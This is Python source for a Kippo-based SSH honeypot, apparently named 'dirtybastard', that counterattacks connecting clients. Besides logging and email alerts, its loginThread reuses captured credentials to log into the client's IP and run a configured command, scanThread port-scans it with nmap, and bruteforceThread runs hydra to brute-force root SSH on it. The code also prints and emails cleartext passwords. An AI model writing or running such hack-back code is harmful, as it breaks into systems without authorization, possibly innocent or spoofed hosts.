def loginThread(self):
    """Try an SSH login to self.clientip with the captured credentials and run a configured command.

    On a successful connect, sends a 'New login success!' email, then executes
    either the 'root_command' or 'not_root_command' entry of the 'dirtybastard'
    config section (chosen by self.username) and emails the collected stdout.
    Returns without further action when the connect call raises.
    """
    client = SSHClient()
    # AutoAddPolicy accepts and caches whatever host key the remote presents,
    # so the connection performs no host-key verification at all.
    client.set_missing_host_key_policy(AutoAddPolicy())
    # Includes the cleartext password; this string is both printed and emailed below.
    loginDetailString = self.username + "@" + self.clientip + " (" + self.password + ")"
    print "Attempting login with", loginDetailString
    try:
        client.connect(hostname=self.clientip, username=self.username, password=self.password)
    except:
        # Bare except: any failure (DNS, refused connection, timeout, even
        # KeyboardInterrupt) is reported as an authentication failure.
        print "Authentication failed for", loginDetailString
        return
    sendEmail('New login success!', "Successfully logged in to remote box: " + loginDetailString)
    configName = "not_root_command"
    if (self.username == "root"):
        configName = "root_command"
    # The config value is stored quoted; [1:-1] drops the first and last character.
    command = config().get('dirtybastard', configName)[1:-1] # Remove quotes
    print "SUCCESS! Running command: " + command
    # stdin and stderr are never read; only stdout is collected.
    stdin, stdout, stderr = client.exec_command(command)
    print "stdout:"
    stdoutString = ""
    # readlines() blocks until the remote command closes its stdout.
    for line in stdout.readlines():
        print line.strip()
        stdoutString = stdoutString + line.strip() + "\n"
    # NOTE(review): client is never closed here; the session is left to garbage collection.
    sendEmail('Output from command', "stdout:\n" + stdoutString);
def checkUserPass(self, username, password):
    """Validate a honeypot login attempt and optionally email about it.

    Returns True when UserDB accepts the username/password pair, False
    otherwise. When the 'smtp' config section has alert_login = true, a
    notification email is sent via sendEmail for each accepted attempt.
    Every attempt (including the cleartext password) is printed to stdout.
    """
    cfg = config()
    accepted = UserDB().checklogin(username, password)
    if not accepted:
        print('login attempt [%s/%s] failed' % (username, password))
        return False
    print('login attempt [%s/%s] succeeded' % (username, password))
    alertWanted = (cfg.has_option('smtp', 'alert_login')
                   and cfg.get('smtp', 'alert_login') == 'true')
    if alertWanted:
        print('Emailing about login notification (alert_login = true).')
        emailMessage = 'There was a succesfully login (%s/%s).' % (username, password)
        sendEmail('SSH Succesful Login', emailMessage)
    return True
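def connectionLost(self, reason):
    """Tear down the honeypot session and optionally email that it ended.

    Notifies every interactor, drops this session from the factory's session
    table, records the exit via self.lastlogExit(), closes the tty log if one
    is open and, when the 'smtp' config section has alert_quit = true, sends
    an 'SSH Attack Finished' email. The parent SSHServerTransport.connectionLost
    is always invoked, even if the notification step raises, so transport
    cleanup cannot be skipped by an SMTP or config error.

    :param reason: the Failure describing why the transport closed; passed
        through unchanged to the parent class.
    """
    cfg = config()
    for interactor in self.interactors:
        interactor.sessionClosed()
    if self.transport.sessionno in self.factory.sessions:
        del self.factory.sessions[self.transport.sessionno]
    self.lastlogExit()
    if self.ttylog_open:
        ttylog.ttylog_close(self.ttylog_file, time.time())
        self.ttylog_open = False
    try:
        if (cfg.has_option('smtp', 'alert_quit')
                and cfg.get('smtp', 'alert_quit') == 'true'):
            print('Emailing about attack being over (alert_quit = true).')
            # Nothing in this file assigns ttylog_file on connect; it appears to
            # be set only once a tty log is opened elsewhere. Use a placeholder
            # instead of raising AttributeError when no shell was ever opened.
            logPath = getattr(self, 'ttylog_file', '<no tty log>')
            emailMessage = 'The attacker quit.\n\nPlease check the logs (%s)!' % (logPath)
            sendEmail('SSH Attack Finished', emailMessage)
    finally:
        # Parent cleanup must run regardless of failures in the alert path.
        transport.SSHServerTransport.connectionLost(self, reason)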
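def connectionMade(self):
    """Initialise per-session state and optionally email about the new probe.

    Prints the peer and local endpoints plus the session number, resets the
    interactor list, records the login time, marks the tty log as closed and,
    when the 'smtp' config section has alert_probe = true, sends an 'SSH Probe'
    email. The parent SSHServerTransport.connectionMade is always invoked,
    even if the notification step raises, so the SSH handshake still starts
    when SMTP is unavailable.
    """
    cfg = config()
    peer = self.transport.getPeer()
    local = self.transport.getHost()
    # Same five values, in the same order, feed both the log line and the email.
    endpoints = (peer.host, peer.port, local.host, local.port, self.transport.sessionno)
    print('New connection: %s:%s (%s:%s) [session: %d]' % endpoints)
    self.interactors = []
    self.logintime = time.time()
    self.ttylog_open = False
    try:
        if (cfg.has_option('smtp', 'alert_probe')
                and cfg.get('smtp', 'alert_probe') == 'true'):
            print('Emailing about SSH probe (alert_probe = true).')
            emailMessage = ('There was an SSH probe request.\nFrom: %s:%s.\nTo: %s:%s.\n'
                            'Kippo Session: %s.' % endpoints)
            sendEmail('SSH Probe', emailMessage)
    finally:
        # Parent setup must run regardless of failures in the alert path.
        transport.SSHServerTransport.connectionMade(self)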
def scanThread(self):
    """Run nmap against self.clientip with the configured arguments and email the per-port results.

    Reads 'nmap_args' from the 'dirtybastard' config section, scans, then
    builds a text report of every TCP/UDP port entry nmap returned for the
    host and sends it via sendEmail. Returns early on nmap.PortScannerError.
    """
    nm = nmap.PortScanner()
    # The config value is stored quoted; [1:-1] drops the first and last character.
    nmapArgs = config().get("dirtybastard", "nmap_args")[1:-1] # Remove quotes
    print "Running portscan at %s with arguments: %s" % (self.clientip, nmapArgs)
    try:
        # r is assigned but never used; results are read back through nm[...] below.
        r = nm.scan(self.clientip, arguments=nmapArgs)
    except nmap.PortScannerError:
        print "!!! PortScan error. Did you request a scan type that requires root?"
        return
    openTcpPorts = []
    openUdpPorts = []
    # A KeyError here means the host (or the "tcp"/"udp" table) is absent from
    # the results; that is treated as "no ports", not as an error.
    try:
        for port in nm[self.clientip]["tcp"].keys():
            openTcpPorts.append(port)
    except KeyError:
        pass
    try:
        for port in nm[self.clientip]["udp"].keys():
            openUdpPorts.append(port)
    except KeyError:
        pass
    resultsString = ""
    # NOTE(review): every port key is labelled "open" without consulting the
    # per-port info (e.g. a 'state' field); depending on the nmap arguments the
    # result table may also list filtered/closed ports — confirm before trusting
    # the report.
    for port in openTcpPorts:
        resultsString += "TCP Port open: %s\n" % (port)
        portInfo = nm[self.clientip]["tcp"][port]
        for key in portInfo:
            resultsString += "\t - %s: %s\n" % (key, portInfo[key])
    for port in openUdpPorts:
        resultsString += "UDP Port open: %s\n" % (port)
        portInfo = nm[self.clientip]["udp"][port]
        for key in portInfo:
            resultsString += "\t - %s: %s\n" % (key, portInfo[key])
    print resultsString
    sendEmail("Port scan results " + self.clientip, resultsString)
def bruteforceThread(self):
    """Run the configured hydra binary against self.clientip and email its stdout.

    Reads 'hydra_location' and 'password_list' from the 'dirtybastard' config
    section, returns early if self.validFiles() rejects either path, then
    blocks until the child process exits.
    """
    print "Launching Hydra at %s." % (self.clientip)
    cfg = config()
    hydraLocation = cfg.get('dirtybastard', 'hydra_location')
    listLocation = cfg.get('dirtybastard', 'password_list')
    if not self.validFiles(hydraLocation, listLocation):
        return
    # argv list with no shell, so clientip and the paths are passed as literal
    # arguments rather than being shell-interpreted.
    cmd = [hydraLocation, self.clientip, "ssh", "-l", "root", "-P" , listLocation]
    p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
    # stderr is not redirected, so err is always None here; the child's exit
    # status is not inspected either.
    out, err = p.communicate()
    print "Hydra complete (%s)." % (self.clientip)
    print "stdout:", out
    sendEmail('Hydra results ' + self.clientip, out)
def loginSuccess(self, username, password):
    """Print a successful-login line and email it as a 'New attacker' alert.

    The line contains the cleartext username and password as supplied.
    """
    detail = 'login attempt [%s/%s] succeeded' % (username, password)
    print(detail)
    sendEmail('New attacker', detail)